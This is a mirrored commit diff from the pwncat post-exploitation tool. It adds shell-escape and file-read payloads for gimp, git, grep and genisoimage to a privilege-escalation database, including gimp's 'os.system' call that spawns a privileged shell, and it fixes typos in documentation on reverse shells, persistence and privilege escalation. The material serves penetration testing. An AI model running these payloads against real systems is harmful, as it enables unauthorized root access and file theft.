mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-12-04 14:23:43 +01:00
Merge branch 'master' of github.com:calebstewart/pwncat
This commit is contained in:
commit
94ea7ea969
@ -800,6 +800,64 @@
|
|||||||
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
|
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"genisoimage": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream" : "print",
|
||||||
|
"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
|
||||||
|
"args": []
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"gimp": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
|
||||||
|
"exit": "exit"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command} 2>/dev/null",
|
||||||
|
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
|
||||||
|
}
|
||||||
|
|
||||||
|
// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
|
||||||
|
// Since it can get a shell, this is not really an issue.
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream":"raw",
|
||||||
|
// "payload": "{command} 2>/dev/null",
|
||||||
|
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
|
||||||
|
// },
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream":"base64",
|
||||||
|
// "payload": "{command} 2>/dev/null",
|
||||||
|
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"git": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["help", "config"],
|
||||||
|
"input": "!{shell}\n",
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"grep": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream":"print",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["''", "{lfile}"]
|
||||||
|
}
|
||||||
|
],
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
@ -3,7 +3,7 @@ API Documentation
|
|||||||
|
|
||||||
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
|
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
|
||||||
with the remote host. A large variety of interaction with the remote host has been abstracted to
|
with the remote host. A large variety of interaction with the remote host has been abstracted to
|
||||||
make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
|
make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
|
||||||
prompt commands or more complicated privilege escalation or persistence methods.
|
prompt commands or more complicated privilege escalation or persistence methods.
|
||||||
|
|
||||||
.. toctree::
|
.. toctree::
|
||||||
|
@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
|
|||||||
Methods vs Techniques
|
Methods vs Techniques
|
||||||
---------------------
|
---------------------
|
||||||
|
|
||||||
Privelege escalation methods may implement multiple techniques. Techniques represent a single action
|
Privilege escalation methods may implement multiple techniques. Techniques represent a single action
|
||||||
which a specific privilege escalation method can perform. Each technique is identified by it's method,
|
which a specific privilege escalation method can perform. Each technique is identified by it's method,
|
||||||
the user which the action can be performed as, a Capability and some method specific data.
|
the user which the action can be performed as, a Capability and some method specific data.
|
||||||
|
|
||||||
|
@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
|
|||||||
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
|
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
|
||||||
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
|
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
|
||||||
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
|
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
|
||||||
on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
|
on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
|
||||||
up until the end delimeter.
|
up until the end delimeter.
|
||||||
|
|
||||||
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
|
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
|
||||||
@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
|
|||||||
import os
|
import os
|
||||||
import shutil
|
import shutil
|
||||||
|
|
||||||
with open("loca-file", "rb") as src:
|
with open("local-file", "rb") as src:
|
||||||
with pwncat.victim.open("/tmp/remote-file", "wb",
|
with pwncat.victim.open("/tmp/remote-file", "wb",
|
||||||
length=os.path.getsize("local-file")) as dst:
|
length=os.path.getsize("local-file")) as dst:
|
||||||
shutil.copyfileobj(src, dst)
|
shutil.copyfileobj(src, dst)
|
||||||
@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
|
|||||||
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
|
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
|
||||||
yielding each abstracted service object. Each object contains a name, description, and state as well as
|
yielding each abstracted service object. Each object contains a name, description, and state as well as
|
||||||
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
|
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
|
||||||
on you having the correct permission to manage the services, however retrieve the state and list of
|
on you having the correct permission to manage the services, however retrieving the state and list of
|
||||||
services should work regardless of your permission level.
|
services should work regardless of your permission level.
|
||||||
|
|
||||||
.. code-block:: python
|
.. code-block:: python
|
||||||
@ -122,7 +122,7 @@ services should work regardless of your permission level.
|
|||||||
print(f"{service.name} is {'running' if service.running else 'stopped'}")
|
print(f"{service.name} is {'running' if service.running else 'stopped'}")
|
||||||
|
|
||||||
To find a specific service by name, there is a ``find_service`` method which returns an individual
|
To find a specific service by name, there is a ``find_service`` method which returns an individual
|
||||||
remote service object. If the service is not found, a ValueError is raised.
|
remote service object. If the service is not found, a ``ValueError`` is raised.
|
||||||
|
|
||||||
.. code-block:: python
|
.. code-block:: python
|
||||||
|
|
||||||
|
@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:
|
|||||||
|
|
||||||
.. code-block:: bash
|
.. code-block:: bash
|
||||||
|
|
||||||
set -p bob "b0b5_P@ss0rd"
|
set -p bob "b0b5_P@ssw0rd"
|
||||||
|
|
||||||
Key Bindings
|
Key Bindings
|
||||||
------------
|
------------
|
||||||
|
@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
|
|||||||
on the remote host and provide you with raw terminal access.
|
on the remote host and provide you with raw terminal access.
|
||||||
|
|
||||||
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
|
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
|
||||||
programatically interact with the remote host alongside your terminal access.
|
programmatically interact with the remote host alongside your terminal access.
|
||||||
pwncat provides you with a local shell interface which can utilize your
|
pwncat provides you with a local shell interface which can utilize your
|
||||||
connection for enumeration, file upload/download, automatic persistence
|
connection for enumeration, file upload/download, automatic persistence
|
||||||
installation and even automated privilege escalation.
|
installation and even automated privilege escalation.
|
||||||
@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
|
|||||||
# You now have a full terminal that doesn't exit on C-c
|
# You now have a full terminal that doesn't exit on C-c
|
||||||
remote$
|
remote$
|
||||||
|
|
||||||
This works well. However, the added steps to get a reverse shell are laberous
|
This works well. However, the added steps to get a reverse shell are laborious
|
||||||
after a while. Also, the danger of losing your remote shell by accidentally
|
after a while. Also, the danger of losing your remote shell by accidentally
|
||||||
pressing "C-c" prior to gaining raw access is high. This was the original
|
pressing "C-c" prior to gaining raw access is high. This was the original
|
||||||
inspiration of this project.
|
inspiration of this project.
|
||||||
|
@ -5,7 +5,7 @@ Installation
|
|||||||
:maxdepth: -1
|
:maxdepth: -1
|
||||||
|
|
||||||
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
|
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
|
||||||
you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
|
you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
|
||||||
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
|
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
|
||||||
|
|
||||||
.. code-block:: bash
|
.. code-block:: bash
|
||||||
|
@ -502,7 +502,7 @@ class Victim:
|
|||||||
:return: The full path to the requested binary or None if it was not found.
|
:return: The full path to the requested binary or None if it was not found.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if self.has_busybox:
|
if self.host.busybox is not None:
|
||||||
if name in self.busybox_provides:
|
if name in self.busybox_provides:
|
||||||
if quote:
|
if quote:
|
||||||
return f"{shlex.quote(str(self.busybox_path))} {name}"
|
return f"{shlex.quote(str(self.busybox_path))} {name}"
|
||||||
|
Loading…
Reference in New Issue
Block a user